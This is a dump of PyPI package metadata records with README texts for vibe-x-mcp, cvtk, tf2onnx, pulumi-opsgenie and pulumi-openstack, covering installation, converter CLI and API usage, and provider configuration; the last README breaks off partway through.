| text/markdown | null | Team VibeJewang <choidage@gmail.com> | null | null | null | ai, code-quality, cursor, mcp, vibe-x | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Topic :: Software Development :: Quality Assurance"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"chromadb>=1.0.0",
"click>=8.1.0",
"fastapi>=0.115.0",
"mcp>=1.0.0",
"pydantic>=2.0.0",
"rich>=13.0.0",
"sentence-transformers>=3.0.0",
"uvicorn>=0.27.0"
] | [] | [] | [] | [
"Homepage, https://github.com/choidage/daker",
"Repository, https://github.com/choidage/daker"
] | twine/6.2.0 CPython/3.11.5 | 2026-02-20T06:36:25.563428 | vibe_x_mcp-1.0.0.tar.gz | 51,648 | 3a/49/a6f8ede8fbbaff7e18a8094ae305540ba9f6c6217fbc695365fb409edbea/vibe_x_mcp-1.0.0.tar.gz | source | sdist | null | false | fc5c62ca5bd57c61a34ba3f789197a4e | 4a79053d3beadc081797a503a60c84a2492ba0fb8c8f39c3a919f7ddbc2f5040 | 3a49a6f8ede8fbbaff7e18a8094ae305540ba9f6c6217fbc695365fb409edbea | MIT | [
"LICENSE"
] | 281 |
2.4 | cvtk | 0.2.18.220 | computer vision toolkit | # cvtk
The cvtk (Computer Vision Toolkit) package provides a suite of command-line tools
for common computer vision tasks,
such as image processing, object detection, and image classification.
Built on top of widely-used libraries like PyTorch and MMDetection,
cvtk offers a straightforward and user-friendly interface for tackling complex tasks.
This simplicity makes it ideal for beginners in both computer vision and Python,
allowing them to quickly initiate and advance their projects in the field.
## Documentation
- https://cvtk.readthedocs.io/en/latest/index.html
## Citation
The cvtk (Computer Vision Toolkit) package was forked from
the [JustDeepIt](https://justdeepit.readthedocs.io/en/latest/index.html) package.
If you are using cvtk in your work, please cite the following reference:
Sun J, Cao W, Yamanaka T.
JustDeepIt: Software tool with graphical and character user interfaces
for deep learning-based object detection and segmentation in image analysis.
Front. Plant Sci., 2022, 13:964058.
doi: [10.3389/fpls.2022.964058](https://doi.org/10.3389/fpls.2022.964058)
| text/markdown | null | Jianqiang Sun <sun@bitdessin.dev> | null | null | MIT | null | [
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Science/Research",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering :: Image Recognition"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"requests",
"filetype",
"pillow",
"numpy>=1.21",
"pandas>=1.3",
"matplotlib",
"pycocotools",
"scikit-learn",
"scikit-image",
"torch; extra == \"full\"",
"torchvision; extra == \"full\"",
"openmim; extra == \"full\"",
"mmengine; extra == \"full\"",
"mmcv; extra == \"full\"",
"mmdet; extra == \"full\"",
"plotly; extra == \"full\"",
"kaleido; extra == \"full\"",
"flask; extra == \"full\"",
"gunicorn; extra == \"full\"",
"label-studio-sdk; extra == \"full\"",
"label-studio-ml; extra == \"full\"",
"label-studio-tools; extra == \"full\"",
"torch; extra == \"docs\"",
"torchvision; extra == \"docs\"",
"openmim; extra == \"docs\"",
"mmengine; extra == \"docs\"",
"mmcv-lite; extra == \"docs\"",
"mmdet; extra == \"docs\"",
"plotly; extra == \"docs\"",
"kaleido; extra == \"docs\"",
"flask; extra == \"docs\"",
"gunicorn; extra == \"docs\"",
"label-studio-sdk; extra == \"docs\"",
"label-studio-ml; extra == \"docs\"",
"label-studio-tools; extra == \"docs\"",
"sphinx; extra == \"docs\"",
"sphinx-rtd-theme; extra == \"docs\"",
"sphinxcontrib-napoleon; extra == \"docs\""
] | [] | [] | [] | [
"Homepage, https://github.com/bitdessin/cvtk",
"Issues, https://github.com/bitdessin/cvtk/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:35:43.841630 | cvtk-0.2.18.220.tar.gz | 54,435 | 59/57/f94ca8cc2c98ade353a3c3f7103f85420ddb4effca1d98d20652c66f9b93/cvtk-0.2.18.220.tar.gz | source | sdist | null | false | a3cadadc98c25d6e491de93fccbb11dd | 440d11f7fa881b03663ae256a6153548d4156faaab40d6a44dd9f1e217ec955c | 5957f94ca8cc2c98ade353a3c3f7103f85420ddb4effca1d98d20652c66f9b93 | null | [] | 225 |
2.4 | tf2onnx | 1.17.0rc1 | Tensorflow to ONNX converter | <!--
Copyright (c) ONNX Project Contributors
SPDX-License-Identifier: Apache-2.0
-->
# tf2onnx - Convert TensorFlow, Keras, Tensorflow.js and Tflite models to ONNX.
tf2onnx converts TensorFlow (tf-2.x), keras, tensorflow.js and tflite models to ONNX via command
line or python api.
## 🛠 Maintainer Wanted
We are currently **looking for a new maintainer** to help support and evolve the `tf2onnx` project.
If you're passionate about the ONNX standard or contributing to the open source machine learning ecosystem, we'd love to hear from you! This is a great opportunity to contribute to a widely used project and collaborate with the ONNX community.
**To express interest:**
Please open an issue or comment on [this thread](https://github.com/onnx/tensorflow-onnx/issues) and let us know about your interest and background.
__Note: tensorflow.js support was just added. While we tested it with many tfjs models from tfhub, it should be considered experimental.__
TensorFlow has many more ops than ONNX and occasionally mapping a model to ONNX creates issues.
You find a list of supported TensorFlow ops and their mapping to ONNX [here](support_status.md).
The common issues we run into we try to document here [Troubleshooting Guide](Troubleshooting.md).
<br/>
| Build Type | OS | Python | TensorFlow | ONNX opset |
| --- | - | --- | --- | --- |
| Unit Test - Basic | Linux, Windows | 3.10-3.12 | 2.13-2.15 | 14-18 |
| Unit Test - Full | Linux, Windows | 3.10-3.12 | 2.13-2.15 | 14-18 |
<br/>
## Supported Versions
### ONNX
tf2onnx will use the ONNX version installed on your system and installs the latest ONNX version if none is found.
We support and test ONNX opset-14 to opset-18. opset-6 to opset-13 should work but we don't test them.
By default we use ```opset-15``` for the resulting ONNX graph.
If you want the graph to be generated with a specific opset, use ```--opset``` in the command line, for example ```--opset 15```.
### TensorFlow
We support ```tf-2.x```. To keep our test matrix manageable we test tf2onnx running on top of ```tf-2.13 or better```.
### Python
We support Python ```3.10-3.12```.
## Prerequisites
### Install TensorFlow
If you don't have TensorFlow installed already, install the desired TensorFlow build, for example:
```pip install tensorflow```
### (Optional) Install runtime
If you want to run tests, install a runtime that can run ONNX models. For example:
ONNX Runtime (available for Linux, Windows, and Mac):
```pip install onnxruntime```
## Installation
### Install from pypi
```pip install -U tf2onnx```
### Install latest from github
```pip install git+https://github.com/onnx/tensorflow-onnx```
### Build and install latest from source (for development)
```git clone https://github.com/onnx/tensorflow-onnx```
Once dependencies are installed, from the tensorflow-onnx folder call:
```python setup.py install```
or
```python setup.py develop```
tensorflow-onnx requires onnx-1.9 or better and will install/upgrade onnx if needed.
To create a wheel for distribution:
```python setup.py bdist_wheel```
## Getting started
To get started with `tensorflow-onnx`, run the `tf2onnx.convert` command, providing:
* the path to your TensorFlow model (where the model is in `saved model` format)
* a name for the ONNX output file:
```python -m tf2onnx.convert --saved-model tensorflow-model-path --output model.onnx```
The above command uses a default of `15` for the ONNX opset. If you need a newer opset, or want to limit your model to use an older opset then you can provide the `--opset` argument to the command. If you are unsure about which opset to use, refer to the [ONNX operator documentation](https://github.com/onnx/onnx/releases).
```python -m tf2onnx.convert --saved-model tensorflow-model-path --opset 18 --output model.onnx```
If your TensorFlow model is in a format other than `saved model`, then you need to provide the inputs and outputs of the model graph.
For `checkpoint` format:
```python -m tf2onnx.convert --checkpoint tensorflow-model-meta-file-path --output model.onnx --inputs input0:0,input1:0 --outputs output0:0```
For `graphdef` format:
```python -m tf2onnx.convert --graphdef tensorflow-model-graphdef-file --output model.onnx --inputs input0:0,input1:0 --outputs output0:0```
If your model is in `checkpoint` or `graphdef` format and you do not know the input and output nodes of the model, you can use the [summarize_graph](https://github.com/tensorflow/tensorflow/tree/master/tensorflow/tools/graph_transforms) TensorFlow utility. The `summarize_graph` tool does need to be downloaded and built from source. If you have the option of going to your model provider and obtaining the model in `saved model` format, then we recommend doing so.
You find an end-to-end tutorial for ssd-mobilenet [here](tutorials/ConvertingSSDMobilenetToONNX.ipynb)
We recently added support for tflite. You convert ```tflite``` models via command line, for example:
```python -m tf2onnx.convert --opset 16 --tflite tflite-file --output model.onnx```
## CLI reference
```
python -m tf2onnx.convert
--saved-model SOURCE_SAVED_MODEL_PATH |
--checkpoint SOURCE_CHECKPOINT_METAFILE_PATH |
--tflite TFLITE_MODEL_PATH |
--tfjs TFJS_MODEL_PATH |
--input | --graphdef SOURCE_GRAPHDEF_PB
--output TARGET_ONNX_MODEL
[--inputs GRAPH_INPUTS]
[--outputs GRAPH_OUTPUS]
[--inputs-as-nchw inputs_provided_as_nchw]
[--outputs-as-nchw outputs_provided_as_nchw]
[--opset OPSET]
[--dequantize]
[--tag TAG]
[--signature_def SIGNATURE_DEF]
[--concrete_function CONCRETE_FUNCTION]
[--target TARGET]
[--extra_opset list-of-extra-opset]
[--custom-ops list-of-custom-ops]
[--load_op_libraries tensorflow_library_path]
[--large_model]
[--continue_on_error]
[--verbose]
[--output_frozen_graph]
```
### Parameters
#### --saved-model
TensorFlow model as saved_model. We expect the path to the saved_model directory.
#### --checkpoint
TensorFlow model as checkpoint. We expect the path to the .meta file.
#### --input or --graphdef
TensorFlow model as graphdef file.
#### --tfjs
Convert a tensorflow.js model by providing a path to the .tfjs file. Inputs/outputs do not need to be specified.
#### --tflite
Convert a tflite model by providing a path to the .tflite file. Inputs/outputs do not need to be specified.
#### --output
The target onnx file path.
#### --inputs, --outputs
TensorFlow model's input/output names, which can be found with [summarize graph tool](#summarize_graph). Those names typically end with ```:0```, for example ```--inputs input0:0,input1:0```. Inputs and outputs are ***not*** needed for models in saved-model format. Some models specify placeholders with unknown ranks and dims which can not be mapped to onnx. In those cases one can add the shape after the input name inside `[]`, for example `--inputs X:0[1,28,28,3]`. Use -1 to indicate unknown dimensions.
#### --inputs-as-nchw
By default we preserve the image format of inputs (`nchw` or `nhwc`) as given in the TensorFlow model. If your hosts (for example windows) native format nchw and the model is written for nhwc, ```--inputs-as-nchw``` tensorflow-onnx will transpose the input. Doing so is convenient for the application and the converter in many cases can optimize the transpose away. For example ```--inputs input0:0,input1:0 --inputs-as-nchw input0:0``` assumes that images are passed into ```input0:0``` as nchw while the TensorFlow model given uses nhwc.
#### --outputs-as-nchw
Similar usage with `--inputs-as-nchw`. By default we preserve the format of outputs (`nchw` or `nhwc`) as shown in the TensorFlow model. If your hosts native format nchw and the model is written for nhwc, ```--outputs-as-nchw``` tensorflow-onnx will transpose the output and optimize the transpose away. For example ```--outputs output0:0,output1:0 --outputs-as-nchw output0:0``` will change the ```output0:0``` as nchw while the TensorFlow model given uses nhwc.
#### --ignore_default, --use_default
ONNX requires default values for graph inputs to be constant, while Tensorflow's PlaceholderWithDefault op accepts computed defaults. To convert such models, pass a comma-separated list of node names to the ignore_default and/or use_default flags. PlaceholderWithDefault nodes with matching names will be replaced with Placeholder or Identity ops, respectively.
#### --opset
By default we use the opset 15 to generate the graph. By specifying ```--opset``` the user can override the default to generate a graph with the desired opset. For example ```--opset 17``` would create a onnx graph that uses only ops available in opset 17. Because older opsets have in most cases fewer ops, some models might not convert on an older opset.
#### --dequantize
(This is experimental, only supported for tflite)
Produces a float32 model from a quantized tflite model. Detects ReLU and ReLU6 ops from quantization bounds.
#### --tag
Only valid with parameter `--saved_model`. Specifies the tag in the saved_model to be used. Typical value is 'serve'.
#### --signature_def
Only valid with parameter `--saved_model`. Specifies which signature to use within the specified --tag value. Typical value is 'serving_default'.
#### --concrete_function
(This is experimental, valid only for TF2.x models)
Only valid with parameter `--saved_model`. If a model contains a list of concrete functions, under the function name `__call__` (as can be viewed using the command `saved_model_cli show --all`), this parameter is a 0-based integer specifying which function in that list should be converted. This parameter takes priority over `--signature_def`, which will be ignored.
#### --target
Some models require special handling to run on some runtimes. In particular, the model may use unsupported data types. Workarounds are activated with ```--target TARGET```. Currently supported values are listed on this [wiki](https://github.com/onnx/tensorflow-onnx/wiki/target). If your model will be run on Windows ML, you should specify the appropriate target value.
#### --extra_opset
If you want to convert a TF model using an existing custom op, this can specify the correspongding domain and version.
The format is a comma-separated map of domain and version, for example: `ai.onnx.contrib:1`.
#### --custom-ops
If a model contains ops not recognized by onnx runtime, you can tag these ops with a custom op domain so that the
runtime can still open the model. The format is a comma-separated map of tf op names to domains in the format
OpName:domain. If only an op name is provided (no colon), the default domain of `ai.onnx.converters.tensorflow`
will be used.
#### --load_op_libraries
Load the comma-separated list of tensorflow plugin/op libraries before conversion.
#### --large_model
(Can be used only for TF2.x models)
Only valid with parameter `--saved_model`. When set, creates a zip file containing the ONNX protobuf model and large tensor values stored externally. This allows for converting models whose size exceeds the 2 GB.
#### --continue_on_error
Continue to run conversion on error, ignore graph cycles so it can report all missing ops and errors.
#### --verbose
Verbose detailed output for diagnostic purposes.
#### --output_frozen_graph
Save the frozen and optimized tensorflow graph to a file for debug.
### <a name="summarize_graph"></a>Tool to get Graph Inputs & Outputs
To find the inputs and outputs for the TensorFlow graph the model developer will know or you can consult TensorFlow's [summarize_graph](https://github.com/tensorflow/tensorflow/tree/master/tensorflow/tools/graph_transforms) tool, for example:
```
summarize_graph --in_graph=tests/models/fc-layers/frozen.pb
```
## Testing
There are 2 types of tests.
### Unit test
```
python setup.py test
```
### Validate pre-trained TensorFlow models
```
python tests/run_pretrained_models.py
usage: run_pretrained_models.py [-h] [--cache CACHE] [--tests TESTS] [--backend BACKEND] [--verbose] [--debug] [--config yaml-config]
optional arguments:
-h, --help show this help message and exit
--cache CACHE pre-trained models cache dir
--tests TESTS tests to run
--backend BACKEND backend to use
--config yaml config file
--verbose verbose output, option is additive
--opset OPSET target opset to use
--perf csv-file capture performance numbers for tensorflow and onnx runtime
--debug dump generated graph with shape info
```
```run_pretrained_models.py``` will run the TensorFlow model, captures the TensorFlow output and runs the same test against the specified ONNX backend after converting the model.
If the option ```--perf csv-file``` is specified, we'll capture the timing for inference of tensorflow and onnx runtime and write the result into the given csv file.
You call it for example with:
```
python tests/run_pretrained_models.py --backend onnxruntime --config tests/run_pretrained_models.yaml --perf perf.csv
```
#### <a name="save_pretrained_model"></a>Tool to save pre-trained model
We provide an [utility](tools/save_pretrained_model.py) to save pre-trained model along with its config.
Put `save_pretrained_model(sess, outputs, feed_inputs, save_dir, model_name)` in your last testing epoch and the pre-trained model and config will be saved under `save_dir/to_onnx`.
Please refer to the example in [tools/save_pretrained_model.py](tools/save_pretrained_model.py) for more information.
Note the minimum required Tensorflow version is r1.6.
## Python API Reference
With tf2onnx-1.8.4 we updated our API. Our old API still works - you find the documentation [here](https://github.com/onnx/tensorflow-onnx/blob/v1.8.3/README.md#python-api-reference).
### from_keras (tf-2.0 and newer)
```
import tf2onnx
model_proto, external_tensor_storage = tf2onnx.convert.from_keras(model,
input_signature=None, opset=None, custom_ops=None,
custom_op_handlers=None, custom_rewriter=None,
inputs_as_nchw=None, outputs_as_nchw=None, extra_opset=None,
shape_override=None, target=None, large_model=False, output_path=None)
Args:
model: the tf.keras model we want to convert
input_signature: a tf.TensorSpec or a numpy array defining the shape/dtype of the input
opset: the opset to be used for the ONNX model, default is the latest
custom_ops: if a model contains ops not recognized by onnx runtime,
you can tag these ops with a custom op domain so that the
runtime can still open the model. Type is a dictionary `{op name: domain}`.
target: list of workarounds applied to help certain platforms
custom_op_handlers: dictionary of custom ops handlers
custom_rewriter: list of custom graph rewriters
extra_opset: list of extra opset's, for example the opset's used by custom ops
shape_override: dict with inputs that override the shapes given by tensorflow
inputs_as_nchw: transpose inputs in list from nhwc to nchw
outputs_as_nchw: transpose outputs in list from nhwc to nchw
large_model: use the ONNX external tensor storage format
output_path: save model to output_path
Returns:
An ONNX model_proto and an external_tensor_storage dict.
```
See [tutorials/keras-resnet50.ipynb](tutorials/keras-resnet50.ipynb) for an end to end example.
### from_function (tf-2.0 and newer)
```
import tf2onnx
model_proto, external_tensor_storage = tf2onnx.convert.from_function(function,
input_signature=None, opset=None, custom_ops=None,
custom_op_handlers=None, custom_rewriter=None, inputs_as_nchw=None,
outputs_as_nchw=None, extra_opset=None, shape_override=None,
target=None, large_model=False, output_path=None)
Args:
function: the tf.function we want to convert
input_signature: a tf.TensorSpec or a numpy array defining the shape/dtype of the input
opset: the opset to be used for the ONNX model, default is the latest
custom_ops: if a model contains ops not recognized by onnx runtime,
you can tag these ops with a custom op domain so that the
runtime can still open the model. Type is a dictionary `{op name: domain}`.
target: list of workarounds applied to help certain platforms
custom_op_handlers: dictionary of custom ops handlers
custom_rewriter: list of custom graph rewriters
extra_opset: list of extra opset's, for example the opset's used by custom ops
shape_override: dict with inputs that override the shapes given by tensorflow
inputs_as_nchw: transpose inputs in list from nhwc to nchw
outputs_as_nchw: transpose outputs in list from nhwc to nchw
large_model: use the ONNX external tensor storage format
output_path: save model to output_path
Returns:
An ONNX model_proto and an external_tensor_storage dict.
```
### from_graph_def
```
import tf2onnx
model_proto, external_tensor_storage = tf2onnx.convert.from_graph_def(graph_def,
name=None, input_names=None, output_names=None, opset=None,
custom_ops=None, custom_op_handlers=None, custom_rewriter=None,
inputs_as_nchw=None, outputs_as_nchw=None, extra_opset=None,
shape_override=None, target=None, large_model=False,
output_path=None)
Args:
graph_def: the graph_def we want to convert
input_names: list of input names
output_names: list of output names
name: A name for the graph
opset: the opset to be used for the ONNX model, default is the latest
target: list of workarounds applied to help certain platforms
custom_op_handlers: dictionary of custom ops handlers
custom_rewriter: list of custom graph rewriters
extra_opset: list of extra opset's, for example the opset's used by custom ops
shape_override: dict with inputs that override the shapes given by tensorflow
inputs_as_nchw: transpose inputs in list from nhwc to nchw
outputs_as_nchw: transpose outputs in list from nhwc to nchw
large_model: use the ONNX external tensor storage format
output_path: save model to output_path
Returns:
An ONNX model_proto and an external_tensor_storage dict.
```
### from_tflite
```
import tf2onnx
model_proto, external_tensor_storage = tf2onnx.convert.from_tflite(tflite_path,
input_names=None, output_names=None, opset=None, custom_ops=None, custom_op_handlers=None,
custom_rewriter=None, inputs_as_nchw=None, outputs_as_nchw=None, extra_opset=None,
shape_override=None, target=None, large_model=False, output_path=None):
Args:
tflite_path: the tflite model file full path
input_names: list of input names
output_names: list of output names
opset: the opset to be used for the ONNX model, default is the latest
custom_ops: if a model contains ops not recognized by onnx runtime,
you can tag these ops with a custom op domain so that the
runtime can still open the model. Type is a dictionary `{op name: domain}`.
custom_op_handlers: dictionary of custom ops handlers
custom_rewriter: list of custom graph rewriters
inputs_as_nchw: transpose inputs in list from nhwc to nchw
outputs_as_nchw: transpose outputs in list from nhwc to nchw
extra_opset: list of extra opset's, for example the opset's used by custom ops
shape_override: dict with inputs that override the shapes given by tensorflow
target: list of workarounds applied to help certain platforms
large_model: use the ONNX external tensor storage format
output_path: save model to output_path
Returns:
An ONNX model_proto and an external_tensor_storage dict.
```
### Creating custom op mappings from python
For complex custom ops that require graph rewrites or input / attribute rewrites using the python interface to insert a custom op will be the easiest way to accomplish the task.
A dictionary of name->custom_op_handler can be passed to tf2onnx.tfonnx.process_tf_graph. If the op name is found in the graph the handler will have access to all internal structures and can rewrite that is needed. For example [examples/custom_op_via_python.py]():
```
import tensorflow as tf
import tf2onnx
from onnx import helper
_TENSORFLOW_DOMAIN = "ai.onnx.converters.tensorflow"
def print_handler(ctx, node, name, args):
# replace tf.Print() with Identity
# T output = Print(T input, data, @list(type) U, @string message, @int first_n, @int summarize)
# becomes:
# T output = Identity(T Input)
node.domain = _TENSORFLOW_DOMAIN
del node.input[1:]
return node
with tf.Session() as sess:
x = tf.placeholder(tf.float32, [2, 3], name="input")
x_ = tf.add(x, x)
x_ = tf.Print(x, [x], "hello")
_ = tf.identity(x_, name="output")
onnx_graph = tf2onnx.tfonnx.process_tf_graph(sess.graph,
custom_op_handlers={"Print": (print_handler, ["Identity", "mode"])},
extra_opset=[helper.make_opsetid(_TENSORFLOW_DOMAIN, 1)],
input_names=["input:0"],
output_names=["output:0"])
model_proto = onnx_graph.make_model("test")
with open("/tmp/model.onnx", "wb") as f:
f.write(model_proto.SerializeToString())
```
## How tf2onnx works
The converter needs to take care of a few things:
1. Convert the protobuf format. Since the format is similar this step is straight forward.
2. TensorFlow types need to be mapped to their ONNX equivalent.
3. For many ops TensorFlow passes parameters like shapes as inputs where ONNX wants to see them as attributes. Since we use a frozen graph, the converter will fetch the input as constant, converts it to an attribute and remove the original input.
4. TensorFlow in many cases composes ops out of multiple simpler ops. The converter will need to identify the subgraph for such ops, slice the subgraph out and replace it with the ONNX equivalent. This can become fairly complex so we use a graph matching library for it. A good example of this is the tensorflow transpose op.
5. TensorFlow's default data format is NHWC where ONNX requires NCHW. The converter will insert transpose ops to deal with this.
6. There are some ops like relu6 that are not supported in ONNX but the converter can be composed out of other ONNX ops.
7. ONNX backends are new and their implementations are not complete yet. For some ops the converter generate ops with deal with issues in existing backends.
### Step 1 - start with a frozen graph
tf2onnx starts with a frozen graph. This is because of item 3 above.
### Step 2 - 1:1 conversion of the protobuf from tensorflow to onnx
tf2onnx first does a simple conversion from the TensorFlow protobuf format to the ONNX protobuf format without looking at individual ops.
We do this so we can use the ONNX graph as internal representation and write helper functions around it.
The code that does the conversion is in tensorflow_to_onnx(). tensorflow_to_onnx() will return the ONNX graph and a dictionary with shape information from TensorFlow. The shape information is helpful in some cases when processing individual ops.
The ONNX graph is wrapped in a Graph object and nodes in the graph are wrapped in a Node object to allow easier graph manipulations on the graph. All code that deals with nodes and graphs is in graph.py.
### Step 3 - rewrite subgraphs
In the next step we apply graph matching code on the graph to re-write subgraphs for ops like transpose and lstm. For an example looks at rewrite_transpose().
### Step 4 - process individual ops
In the fourth step we look at individual ops that need attention. The dictionary _OPS_MAPPING will map tensorflow op types to a method that is used to process the op. The simplest case is direct_op() where the op can be taken as is. Whenever possible we try to group ops into common processing, for example all ops that require dealing with broadcasting are mapped to broadcast_op(). For an op that composes the tensorflow op from multiple onnx ops, see relu6_op().
### Step 5 - optimize the functional ONNX graph
We than try to optimize the functional ONNX graph. For example we remove ops that are not needed,
remove transposes as much as possible, de-dupe constants, fuse ops whenever possible, ...
### Step 6 - final processing
Once all ops are converted and optimize, we need to do a topological sort since ONNX requires it. process_tf_graph() is the method that takes care of all above steps.
## Extending tf2onnx
If you like to contribute and add new conversions to tf2onnx, the process is something like:
1. See if the op fits into one of the existing mappings. If so adding it to _OPS_MAPPING is all that is needed.
2. If the new op needs extra processing, start a new mapping function.
3. If the tensorflow op is composed of multiple ops, consider using a graph re-write. While this might be a little harder initially, it works better for complex patterns.
4. Add a unit test in tests/test_backend.py. The unit tests mostly create the tensorflow graph, run it and capture the output, than convert to onnx, run against a onnx backend and compare tensorflow and onnx results.
5. If there are pre-trained models that use the new op, consider adding those to test/run_pretrained_models.py.
## License
[Apache License v2.0](LICENSE)
| text/markdown | null | ONNX <onnx-technical-discuss@lists.lfaidata.foundation> | null | null | null | null | [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Mathematics",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Python Modules",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"numpy>=1.23.5",
"onnx>=1.14.0",
"requests",
"flatbuffers>=1.12",
"protobuf>=3.20",
"graphviz; extra == \"test\"",
"parameterized; extra == \"test\"",
"pytest; extra == \"test\"",
"pytest-cov; extra == \"test\"",
"pyyaml; extra == \"test\""
] | [] | [] | [] | [
"Homepage, https://github.com/onnx/tensorflow-onnx"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:34:59.915717 | tf2onnx-1.17.0rc1.tar.gz | 591,264 | 09/4e/bc69ad40af0577383d108cf7efd347846750f050bb93d0fd097149f73f7c/tf2onnx-1.17.0rc1.tar.gz | source | sdist | null | false | 454444950609808cabae8f77dc545f92 | 22f01ae2305318241a8b40c79c2bcaa33724da46bc8bbebd3fb96fb80603f78b | 094ebc69ad40af0577383d108cf7efd347846750f050bb93d0fd097149f73f7c | Apache-2.0 | [
"LICENSE"
] | 602 |
2.4 | pulumi-opsgenie | 1.4.0a1771568901 | A Pulumi package for creating and managing opsgenie cloud resources. | [](https://github.com/pulumi/pulumi-opsgenie/actions)
[](https://slack.pulumi.com)
[](https://npmjs.com/package/@pulumi/opsgenie)
[](https://badge.fury.io/nu/pulumi.opsgenie)
[](https://pypi.org/project/pulumi-opsgenie)
[](https://pkg.go.dev/github.com/pulumi/pulumi-opsgenie/sdk/go)
[](https://github.com/pulumi/pulumi-opsgenie/blob/master/LICENSE)
# Opsgenie Resource Provider
The OpsGenie resource provider for Pulumi lets you manage opsgenie resources in your cloud programs. To use this package, please install the Pulumi CLI first.
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/opsgenie
or `yarn`:
$ yarn add @pulumi/opsgenie
### Python
To use from Python, install using `pip`:
$ pip install pulumi_opsgenie
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-opsgenie/sdk
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Opsgenie
## Configuration
The following configuration points are available for the `opsgenie` provider:
- `opsgenie:api_key` (Required) - the API key for `opsgenie`. Can also be provided with `OPSGENIE_API_KEY`.
- `opsgenie:api_url` (Optional) - the API url for `opsgenie`. Can also be provided with `OPSGENIE_API_URL`. Defaults to `api.opsgenie.com`.
## Reference
For detailed reference documentation, please visit [the API docs][1].
[1]: https://www.pulumi.com/docs/reference/pkg/opsgenie/
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, opsgenie | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-opsgenie"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:34:48.913195 | pulumi_opsgenie-1.4.0a1771568901.tar.gz | 76,987 | f6/fc/77ecfe7a541feef08e4eeb4a2c6b04097e66be780a91a32ce93eb96ec94b/pulumi_opsgenie-1.4.0a1771568901.tar.gz | source | sdist | null | false | 001f3bb4bb0d722d36d38acc4e9f2096 | 00f2b57a44143162c167321825de27bac251ae4b7650e99781a4b1ebfc2b34e5 | f6fc77ecfe7a541feef08e4eeb4a2c6b04097e66be780a91a32ce93eb96ec94b | null | [] | 201 |
2.4 | pulumi-openstack | 5.5.0a1771568855 | A Pulumi package for creating and managing OpenStack cloud resources. | [](https://github.com/pulumi/pulumi-openstack/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/openstack)
[](https://pypi.org/project/pulumi-openstack)
[](https://badge.fury.io/nu/pulumi.openstack)
[](https://pkg.go.dev/github.com/pulumi/pulumi-openstack/sdk/v3/go)
[](https://github.com/pulumi/pulumi-openstack/blob/master/LICENSE)
# OpenStack Resource Provider
The OpenStack resource provider for Pulumi lets you use OpenStack resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/openstack
or `yarn`:
$ yarn add @pulumi/openstack
### Python
To use from Python, install using `pip`:
$ pip install pulumi_openstack
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-openstack/sdk/v4
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Openstack
## Configuration
The following configuration points are available:
- `openstack:authUrl` - (Optional) The Identity authentication URL. If omitted, the `OS_AUTH_URL` environment variable is used.
- `openstack:cloud` - (Optional) An entry in a `clouds.yaml` file. See the OpenStack `openstacksdk`
[documentation](https://docs.openstack.org/openstacksdk/latest/user/config/configuration.html) for more information about
`clouds.yaml` files. If omitted, the `OS_CLOUD` environment variable is used.
- `openstack:region` - (Optional) The region of the OpenStack cloud to use. If omitted, the `OS_REGION_NAME` environment
variable is used. If `OS_REGION_NAME` is not set, then no region will be used. It should be possible to omit the region
in single-region OpenStack environments, but this behavior may vary depending on the OpenStack environment being used.
- `openstack:userName` - (Optional) The Username to login with. If omitted, the `OS_USERNAME` environment variable is used.
- `openstack:userId` - (Optional) The User ID to login with. If omitted, the `OS_USER_ID` environment variable is used.
- `openstack:applicationCredentialId` - (Optional) (Identity v3 only) The ID of an application credential to authenticate with. An
`applicationCredentialSecret` has to bet set along with this parameter. Can be set via the `OS_APPLICATION_CREDENTIAL_ID`
environment variable.
- `openstack:applicationCredentialName` - (Optional) (Identity v3 only) The name of an application credential to authenticate with.
Conflicts with the `applicationCredentialName`, requires `userId`, or `userName` and `userDomainName` (or `userDomainId`) to be set.
Can be set via the `OS_APPLICATION_CREDENTIAL_NAME` environment variable.
- `openstack:applicationCredentialSecret` - (Optional) (Identity v3 only) The secret of an application credential to authenticate with.
Required by `applicationCredentialId` or `applicationCredentialName`. Can be set via the `OS_APPLICATION_CREDENTIAL_SECRET`
environment variable.
- `openstack:tenantId` - (Optional) The ID of the Tenant (Identity v2) or Project (Identity v3) to login with. If omitted, the
`OS_TENANT_ID` or `OS_PROJECT_ID` environment variables are used.
- `openstack:tenantName` - (Optional) The Name of the Tenant (Identity v2) or Project (Identity v3) to login with. If omitted,
the `OS_TENANT_NAME` or `OS_PROJECT_NAME` environment variable are used.
- `openstack:password` - (Optional) The Password to login with. If omitted, the
